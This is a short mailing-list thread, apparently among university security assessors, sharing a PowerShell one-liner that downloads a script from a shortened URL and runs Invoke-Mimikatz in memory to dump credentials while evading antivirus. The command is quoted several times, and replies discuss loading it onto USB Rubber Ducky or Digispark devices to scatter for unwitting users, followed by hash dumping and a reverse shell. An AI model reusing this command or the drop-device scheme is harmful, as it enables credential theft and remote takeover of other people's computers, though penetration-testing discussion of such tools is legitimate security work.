This command runs mimikats using PowerShell. It runs fully in memory and doesn't touch disk except if you choose to dump the output to a text file. So far I haven't seen AV detect it.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" > mimikatz.txt
Given what day it is, this isn't something along the lines of "Don't let Johnny jack into your switch, is it?"
On 04/01/2015 09:42 AM, Jon Barclay wrote:
This command runs mimikats using PowerShell. It runs fully in memory and doesn’t touch disk except if you choose to dump the output to a text file. So far I haven’t seen AV detect it.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" > mimikatz.txt
USHE-assess mailing list USHE-assess@lists.dixie.edu http://lists.dixie.edu/cgi-bin/mailman/listinfo/ushe-assess
That's a good find! I've been trying to solve the av-mimikatz issue for the rubber ducky for a little while now. I'll try it later when I can get a vm fired up.
I love that mimikatz has been rendered into it's own powershell commandlet. That's just awesome sauce on your steak, right there. It's one of the best custom written commandlets I've seen too. The reason AV doesn't alert on it is it's not truly the mimikatz binary, but is some kind of full powershell rewrite of the mimikatz functionality. I've used many powersploit commandlets before, even on your campus last week, but I've never seen or used this one. Pretty excited to see if I can finally make that work on the cheap digiasparks and their short memory! Then we'll have us some rubber ducky fun! Just throw those around everywhere to get plugged in.
On Wed, Apr 1, 2015 at 9:42 AM, Jon Barclay Jon.Barclay@uvu.edu wrote:
This command runs mimikats using PowerShell. It runs fully in memory and doesn’t touch disk except if you choose to dump the output to a text file. So far I haven’t seen AV detect it.
powershell "IEX (New-Object Net.WebClient).DownloadString(' http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" > mimikatz.txt
USHE-assess mailing list USHE-assess@lists.dixie.edu http://lists.dixie.edu/cgi-bin/mailman/listinfo/ushe-assess
It works great with the twin duck firmware. ;-)
It seems like the ideal load for the duck is mimikats, dump hashes, and then reverse shell. All in memory with PowerShell and all within 20 seconds.
From: ushe-assess-bounces@lists.dixie.edu [mailto:ushe-assess-bounces@lists.dixie.edu] On Behalf Of Chuck Kimber Sent: Wednesday, April 1, 2015 10:42 AM Cc: ushe-assess@lists.dixie.edu Subject: Re: [USHE-assess] Mimikats
That's a good find! I've been trying to solve the av-mimikatz issue for the rubber ducky for a little while now. I'll try it later when I can get a vm fired up.
I love that mimikatz has been rendered into it's own powershell commandlet. That's just awesome sauce on your steak, right there. It's one of the best custom written commandlets I've seen too. The reason AV doesn't alert on it is it's not truly the mimikatz binary, but is some kind of full powershell rewrite of the mimikatz functionality. I've used many powersploit commandlets before, even on your campus last week, but I've never seen or used this one. Pretty excited to see if I can finally make that work on the cheap digiasparks and their short memory! Then we'll have us some rubber ducky fun! Just throw those around everywhere to get plugged in.
On Wed, Apr 1, 2015 at 9:42 AM, Jon Barclay <Jon.Barclay@uvu.edumailto:Jon.Barclay@uvu.edu> wrote: This command runs mimikats using PowerShell. It runs fully in memory and doesn’t touch disk except if you choose to dump the output to a text file. So far I haven’t seen AV detect it.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" > mimikatz.txt
_______________________________________________ USHE-assess mailing list USHE-assess@lists.dixie.edumailto:USHE-assess@lists.dixie.edu http://lists.dixie.edu/cgi-bin/mailman/listinfo/ushe-assess
participants (3)
-
Andrew Goble -
Chuck Kimber -
Jon Barclay